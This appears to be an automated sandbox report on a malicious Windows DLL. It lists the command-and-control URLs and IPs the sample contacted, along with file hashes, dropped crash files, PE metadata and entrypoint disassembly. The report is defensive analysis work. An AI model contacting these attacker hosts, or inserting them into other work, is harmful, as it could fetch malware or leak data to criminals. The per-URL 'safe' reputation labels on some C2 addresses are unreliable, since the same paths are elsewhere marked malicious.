                      http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlktrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlktrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://194.76.226.200/drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://194.76.226.200/drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlktrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlktrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenusloaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dllfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://habpfans.at/loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wloaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://upx.sf.netAmcache.hve.7.drfalse
                        		high
                        http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://31.214.157.187/loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://habpfans.at/gloaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://194214.157.187/loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.dhtmlcentral.com/tutorial.asploaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dllfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        181.129.180.251
                        		unknownColombia
                        		13489EPMTelecomunicacionesSAESPCOtrue
                        41.41.255.235
                        		habpfans.atEgypt
                        		8452TE-ASTE-ASEGtrue
                        211.119.84.112
                        		giporedtrip.atKorea Republic of
                        		3786LGDACOMLGDACOMCorporationKRtrue
                        31.214.157.187
                        		unknownGermany
                        		58329RACKPLACEDEtrue
                        61.36.14.230
                        		unknownKorea Republic of
                        		3786LGDACOMLGDACOMCorporationKRtrue
                        194.76.226.200
                        		unknownGermany
                        		39378SERVINGADEtrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:560543
                        Start date:26.01.2022
                        Start time:17:02:04
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 43s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:hFGZpat9Mf.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:34
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@6/6@4/7
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 94.6% (good quality ratio 93.1%)
                        • Quality average: 83.4%
                        • Quality standard deviation: 23.8%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        • Override analysis time to 240s for rundll32

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 104.208.16.94, 13.107.43.16
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, l-0007.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        17:03:26API Interceptor12x Sleep call for process: loaddll32.exe modified
                        17:03:34API Interceptor1x Sleep call for process: WerFault.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_319baef4101f2973dda1833cdb25524ddf68727_82810a17_11720b30\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9231380421791202
                        Encrypted:false
                        SSDEEP:192:dSiB0oXKHBUZMX4jed+tTN/u7slS274ItWc:civXiBUZMX4jeI5/u7slX4ItWc
                        MD5:2E9E475BBF5C444FDD216D612789DF16
                        SHA1:962AD3179B750CF580262E1907A21695CCCF95CA
                        SHA-256:0064278D09AABB28FEDAF0249EA8CB8FE70CA1E041D4894DCF53040F05E19E31
                        SHA-512:18EBA813F6A28E2B7751BD3001B4482C544F808182C859505F4FBFDC25EAAA2F687261D01906D9337561C1D8F0E8ACC7BD71C9A5A2211592E1F48E8D3637A661
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.7.1.8.9.9.3.2.8.3.8.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.7.1.9.0.1.2.5.8.0.7.2.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.3.8.9.6.b.0.-.5.3.f.3.-.4.c.c.7.-.8.1.1.7.-.7.c.f.5.a.2.3.c.6.8.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.e.b.9.5.e.c.-.d.e.6.2.-.4.7.8.9.-.9.a.2.7.-.4.9.f.7.3.2.8.d.6.c.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.8.-.0.0.0.1.-.0.0.1.6.-.2.4.9.8.-.9.3.a.3.1.9.1.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 27 01:03:17 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):50394
                        Entropy (8bit):2.1230258138964713
                        Encrypted:false
                        SSDEEP:192:v7u7354xKvI2O5Skb+XKD74zz7hFK/dDBRvU0SF9Dq0Awi/Y4p:/oQB5Lb+XKIzz7hFadDBR8xFpq0Awi/
                        MD5:E557B9E94120C75B30455B3AB7BB4F67
                        SHA1:2816C199A296B247FADBC24CB7248059CC2AA728
                        SHA-256:A0FB0FDB2F46849AE8FFCCB0F6830134282C4BEF5375EC4B3328CA9957E8FC78
                        SHA-512:1B07B0D1CC742AB0398A7C0CF12C6A6D4AD57568006FC2B39D05E84E9B93F969C117C21CCF5CC366B21403FCE10D970DE56DAA1951B4037F3A93066D91297D33
                        Malicious:false
                        Reputation:low
                        Preview:MDMP....... .......U..a....................................d..../..........T.......8...........T...........@...............`...........L....................................................................U...........B..............GenuineIntelW...........T...........H..a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5399.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8312
                        Entropy (8bit):3.6976983898128415
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNips6rRf+Z46YBgah6TgmfTNSOCprR689bW4sfcSm:RrlsNiy6Ff246YBb6TgmfTNSHDWrfI
                        MD5:1F0DCAF8CAD8216C2681E359FDB9FC32
                        SHA1:F83B65FE0F97B36C53DEA67EF86D390C5F2E4874
                        SHA-256:C48C34B58275C8586BA05F0DE058403E5D4BEF7A7489275B5971858A1B1B65DA
                        SHA-512:3B02715FD729AA52FA2738D709F4B09EA244329D1CD8A1FAED420EE2A0A87085BE984ABD38EC3BDF61C2A0D0A5DFCA9640331E596FE7971D8009FF0C5E986BD9
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.7.2.<./.P.i.d.>.......

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6656.tmp.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4670
                        Entropy (8bit):4.493943117199789
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zs8JgtWI9A2VWSC8BVs8fm8M4JCdszZFAV+q8/OD0yx4SrS1d:uITf632kSNXRJRUVt0iDW1d
                        MD5:0126F95A901429A83B8D25CA87CD378F
                        SHA1:B291C283CF80A9811F1EA5703267243116199DDD
                        SHA-256:507F8842DAC1704D0AF596840F0F75862C0CEC375118DCBDC55ED85F1D39E175
                        SHA-512:6D3D54EE263306831C43EB89F8246689251F0E293ABB94C3E5F63E658D95274E665B774CEB35CD1BB8A8E74F10FE749C0B5315E26085DC76BFC232DBED680EEC
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1359974" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                        C:\Windows\appcompat\Programs\Amcache.hve

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.2638646695109035
                        Encrypted:false
                        SSDEEP:12288:MLR2cbZ/FPLJ86W9cwmTJw4qNsIbc65wppMcGFtz3OUkB8lA6LD6y7Rt:sR2cbZ/FPLJ86W9yqYKt
                        MD5:35049590C5CC406E8B91A1B0B5092584
                        SHA1:B8ACCA4CFDD281BC793D177261B5A769CAE049C3
                        SHA-256:B84991E6386C563D75788B986DA5381F88A5EA41408DD98DA31B8E2C4755528A
                        SHA-512:26800F9733BF8608CB4BF2C24592BDA4092458DC12E2B707C5503956015600540CF36114916E5696D997FDB72896332A3014664287BC26840D9D79B40F9CC19A
                        Malicious:false
                        Reputation:low
                        Preview:regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):24576
                        Entropy (8bit):3.8361821028758083
                        Encrypted:false
                        SSDEEP:384:Zwb5uZrdgdXX5gQp8XXLnxOf2oMPmxwp95GjZmGuADTTeW5N5oAR1V:mlcreXXZpigf2ovxwp3WmGuuTeSN51R1
                        MD5:498211172CBFC34A13FD2E9630E30A11
                        SHA1:7413547E9D96756DF22533A3E31E05F5996C75CC
                        SHA-256:6B575ABA2719D1440DCAFECBA4C5FBA11673407180D636A18D597189984D0B21
                        SHA-512:2E58314560305ECCCEFA4377EA207FC5B825E2B55E4F2AA1314355E89E44C2D2AFF62D830A82B8D3731E3650AC473C79E19A5A79C0F6DB0D71132481E69CAC90
                        Malicious:false
                        Reputation:low
                        Preview:regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.....................................................................................................................................................................................................................................................................................................................................................e..HvLE.^......P...............}JB...l..+|.............................. ..hbin................p.\..,..........nk,..(..........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..(.......... ...........P............... .......Z.......................Root........lf......Root....nk ..(.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.882756524717819
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 97.97%
                        • Win32 Executable Delphi generic (14689/80) 1.44%
                        • Win16/32 Executable Delphi generic (2074/23) 0.20%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        File name:hFGZpat9Mf.dll
                        File size:655360
                        MD5:9acde2c3e3a375590a1bc716eabc52c5
                        SHA1:e231c9ae802a9aad9916f08256f7558f531d54ce
                        SHA256:57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
                        SHA512:3c282a6dac4c1a655a6851ef7bcf9d336603614216f93e8bde031697118439081b113bb71473e2939b30225fa684d56d9dbc80bd888cc3312b167c7bef130946
                        SSDEEP:12288:CxdKNJ2yElIM31TVlVPt0+JQjahIx9Q2oleUcUGHS:CwuyElIMlTzBt0Bp3seBU
                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                        File Icon

                        Icon Hash:b99988fcd4f66e0f

                        Static PE Info

                        General

                        Entrypoint:0x46b448
                        Entrypoint Section:CODE
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                        DLL Characteristics:
                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:7f3476b35f56feee8663a4d549e47d9e

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        add esp, FFFFFFC4h
                        push ebx
                        mov eax, 0046B028h
                        call 00007F8E18CB1738h
                        push 0046BDF8h
                        call 00007F8E18CB1A8Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A80h
                        push 0046BDF8h
                        call 00007F8E18CB1A76h
                        push 0046BDF8h
                        call 00007F8E18CB1A6Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A62h
                        push 0046BDF8h
                        call 00007F8E18CB1A58h
                        push 0046BDF8h
                        call 00007F8E18CB1A4Eh
                        push 0046BDF8h
                        call 00007F8E18CB1A44h
                        push 0046BDF8h
                        call 00007F8E18CB1A3Ah
                        push 0046BDF8h
                        call 00007F8E18CB1A30h
                        push 0046BDF8h
                        call 00007F8E18CB1A26h
                        push 0046BDF8h
                        call 00007F8E18CB1A1Ch
                        push 0046BDF8h
                        call 00007F8E18CB1A12h
                        push 0046BDF8h
                        call 00007F8E18CB1A08h
                        push 0046BDF8h
                        call 00007F8E18CB19FEh
                        push 0046BDF8h
                        call 00007F8E18CB19F4h
                        push 0046BDF8h
                        call 00007F8E18CB19EAh
                        push 0046BDF8h
                        call 00007F8E18CB19E0h
                        push 0000BDF8h

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x700000x2172.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x29600.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x6e18.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        CODE0x10000x6ae040x6b000False0.529191917348data6.56713483483IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        DATA0x6c0000x23240x2400False0.465928819444data4.93971870671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        BSS0x6f0000xf550x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .idata0x700000x21720x2200False0.365349264706data4.98625501899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc0x730000x6e180x7000False0.615618024554data6.66070715654IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                        .rsrc0x7a0000x296000x29600False0.458589029456data6.73870167703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_CURSOR0x7bd680x134data
                        RT_CURSOR0x7be9c0x134data
                        RT_CURSOR0x7bfd00x134data
                        RT_CURSOR0x7c1040x134data
                        RT_CURSOR0x7c2380x134data
                        RT_CURSOR0x7c36c0x134data
                        RT_CURSOR0x7c4a00x134data
                        RT_BITMAP0x7c5d40x1d0data
                        RT_BITMAP0x7c7a40x1e4data
                        RT_BITMAP0x7c9880x1d0data
                        RT_BITMAP0x7cb580x1d0data
                        RT_BITMAP0x7cd280x1d0data
                        RT_BITMAP0x7cef80x1d0data
                        RT_BITMAP0x7d0c80x1d0data
                        RT_BITMAP0x7d2980x1d0data
                        RT_BITMAP0x7d4680x1d0data
                        RT_BITMAP0x7d6380x1d0data
                        RT_BITMAP0x7d8080xe8GLS_BINARY_LSB_FIRST
                        RT_ICON0x7d8f00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059EnglishUnited States
